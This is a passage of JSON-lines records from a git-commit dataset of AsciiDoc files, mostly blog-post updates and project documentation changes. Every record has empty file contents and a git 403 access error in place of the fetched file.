2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fbfd001482bcbe26ac34afae7cdbc1d6a9db508","subject":"Update 2017-07-07-release-ml-utils.adoc","message":"Update 2017-07-07-release-ml-utils.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-release-ml-utils.adoc","new_file":"_posts\/2017-07-07-release-ml-utils.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76ff80e3b25bcb81d2e8ef0dac3b223ce28dab36","subject":"y2b create post PlayStation Vita Remote Play Demo","message":"y2b create post PlayStation Vita Remote Play 
Demo","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-28-PlayStation-Vita-Remote-Play-Demo.adoc","new_file":"_posts\/2011-12-28-PlayStation-Vita-Remote-Play-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8064d9a6c1f1c785ace986161ae69156a473afe","subject":"Update 2017-02-07-Review-Git-Github-para-Iniciantes.adoc","message":"Update 2017-02-07-Review-Git-Github-para-Iniciantes.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2017-02-07-Review-Git-Github-para-Iniciantes.adoc","new_file":"_posts\/2017-02-07-Review-Git-Github-para-Iniciantes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32397038bc83444fa9bd6e8481f83a54c148e5d6","subject":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da39ce5fc57f046ded21f6aa22ae995708275854","subject":"Update 2010-01-26-O-Google-e-o-TOS.adoc","message":"Update 2010-01-26-O-Google-e-o-TOS.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2010-01-26-O-Google-e-o-TOS.adoc","new_file":"_posts\/2010-01-26-O-Google-e-o-TOS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95d1d3031223aed264dd6b4d23e379676a466641","subject":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8c0311f7f8b6de4f200a384445c6515fe5f7d74","subject":"y2b create post Bend Proof iPhone 6 Plus Case?","message":"y2b create post Bend Proof iPhone 6 Plus 
Case?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-13-Bend-Proof-iPhone-6-Plus-Case.adoc","new_file":"_posts\/2015-03-13-Bend-Proof-iPhone-6-Plus-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9171f983b624de8eb31f5ed96aa4c6133f87bf5","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e62d48b90603ebc0f2dff43c2cd6703e18421312","subject":"Add 'Feature Request' document template (#36)","message":"Add 'Feature Request' document template (#36)\n\n","repos":"mbbx6spp\/styleguides","old_file":"docs\/FEATURE_REQUEST.adoc","new_file":"docs\/FEATURE_REQUEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbbx6spp\/styleguides.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee9c6486a04ca8a75180552e05d95efbf5eb32be","subject":"2016-07-26-Sailing.adoc","message":"2016-07-26-Sailing.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-26-Sailing.adoc","new_file":"_posts\/2016-07-26-Sailing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"307656ec568d3ec6584581f1c2d1eb4cea9ccc70","subject":"Update 2016-6-27-json-decode-json-encode.adoc","message":"Update 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1402ac21484de93a652ec0663572b194f3ec17b5","subject":"Hawkular Metrics 0.9.0 - Release Announcement","message":"Hawkular Metrics 0.9.0 - Release 
Announcement\n","repos":"lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/10\/30\/hawkular-metrics-0.8.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/10\/30\/hawkular-metrics-0.8.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df17319e8084f3b8072065b122a0f728f9844890","subject":"Job: #11367","message":"Job: #11367\n\nIntroduce doc\n","repos":"leviathan747\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11367_wasl_mm\/11367_wasl_mm.int.adoc","new_file":"doc-bridgepoint\/notes\/11367_wasl_mm\/11367_wasl_mm.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8826c7f6e1987815188358df8df0c5d9e04af2bd","subject":"Update 2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","message":"Update 
2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","new_file":"_posts\/2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d769e0e5c4aba67d398116c4751b2c5aefa0c77","subject":"As the tip now spans multiple blocks we need to mark start and end.","message":"As the tip now spans multiple blocks we need to mark start and end.\n","repos":"lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32fdd3681bd2e45b284ee6674db1ec3742f906ff","subject":"Update 2015-09-18-Credits.adoc","message":"Update 2015-09-18-Credits.adoc","repos":"NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io","old_file":"_posts\/2015-09-18-Credits.adoc","new_file":"_posts\/2015-09-18-Credits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NadineLaCuisine\/NadineLaCuisine.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32f82dc8fc766e047170c1b9f2f6e52e0a50409d","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 
2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8551c9df0c18c32b2453362921f4a4a4a8ac62cd","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce42670c7c694c88b94a07ce142588184494f766","subject":"[DOCS] Build Elasticsearch Reference from elasticsearch repo (#28469)","message":"[DOCS] Build Elasticsearch Reference from elasticsearch repo (#28469)\n\n","repos":"vroyer\/elasticassandra,vroyer\/elasticassandra,vroyer\/elasticassandra","old_file":"docs\/reference\/index.x.asciidoc","new_file":"docs\/reference\/index.x.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vroyer\/elasticassandra.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2fbb1e14615b8960c9780c5f25d1678cd9fa1d5","subject":"\/toycode: explain what the gist is linking to, rather than paste the raw URL","message":"\/toycode: explain what the gist is linking to, rather than paste the raw URL\n","repos":"jzacsh\/jzacsh.github.com,jzacsh\/jzacsh.github.com,jzacsh\/jzacsh.github.com","old_file":"content\/toycode.adoc","new_file":"content\/toycode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/jzacsh.github.com.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"395783634b037f5a32266fc1209d047b3b208c2e","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9846ee06f1eab445f07b8a2a6375a170b402213a","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f6c5607b61bb684b638fa00292d6a0dccff8c12","subject":"Update 2016-05-03-Episode-55-Education-is-Important-But-Pinball-is-Importanter.adoc","message":"Update 2016-05-03-Episode-55-Education-is-Important-But-Pinball-is-Importanter.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-05-03-Episode-55-Education-is-Important-But-Pinball-is-Importanter.adoc","new_file":"_posts\/2016-05-03-Episode-55-Education-is-Important-But-Pinball-is-Importanter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"682c664d54111dc923c5960779231a93e3bf098f","subject":"Fix wrong code blocks in the document","message":"Fix wrong code blocks in the document\n\nChange-Id: I93c27c8f7e4dbe198478cbe2f80eed037171eac5\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2144\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63bf6f129e9383519646563721933771a7e7199e","subject":"Minor fixes to the Impala doc","message":"Minor fixes to the Impala doc\n\nAdded a NOTE for a thing that's easy to miss and fixed the query to check if everything is setup\ncorrectly.\n\nChange-Id: I4c2a0c60e9d41c8b079527aabbcd46002f647de0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1056\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon 
<2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"56cc69226fa6a053e6f038ac2b1d12b6fc533e37","subject":"[doc] KUDU-1630 impala_tables.html link is showing as text and not actual link","message":"[doc] KUDU-1630 impala_tables.html link is showing as text and not actual link\n\nMissing space before the hyperlink was causing this issue.\nHyperlinked \"Impala documentation\" text to appropriate impala link.\n\nComplete text being:\nSee the Impala documentation for more information about internal and external tables.\n\nPlease check the resultant html here:\nhttps:\/\/github.com\/ninadshr\/sample_repo\/blob\/master\/kudu_impala_integration.html\n\nChange-Id: I25c1251b312586b38a558eb3365f60f7ff3a7ba0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4483\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\nTested-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e4e12773cd7ff0674ff8bce9444b7b63bd42677","subject":"more document edit\/cleanup","message":"more document edit\/cleanup\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"draft_trex_stateless.asciidoc","new_file":"draft_trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de262f0e70ec40053635ac2389e9b41bb7deef79","subject":"Inital import of yabar manpage into asciidoc","message":"Inital import of yabar manpage into asciidoc\n","repos":"geommer\/yabar","old_file":"doc\/yabar.1.asciidoc","new_file":"doc\/yabar.1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/geommer\/yabar.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a1ba7484c3719fbd805a675715202afcb1f02fd","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07522fe6725d50582bcf26e29289ef588218cc67","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5503505ea2bddee8b0d5dce65244dbcdad93b699","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a082b6384745e8fa5f2f575716d29675dbad5bc","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b36fb052c10eea5b248bfab71e5caffaf51ef92","subject":"Update completion-suggest.asciidoc (#24506)","message":"Update completion-suggest.asciidoc 
(#24506)\n\n","repos":"robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,vroyer\/elasticassandra,nknize\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticse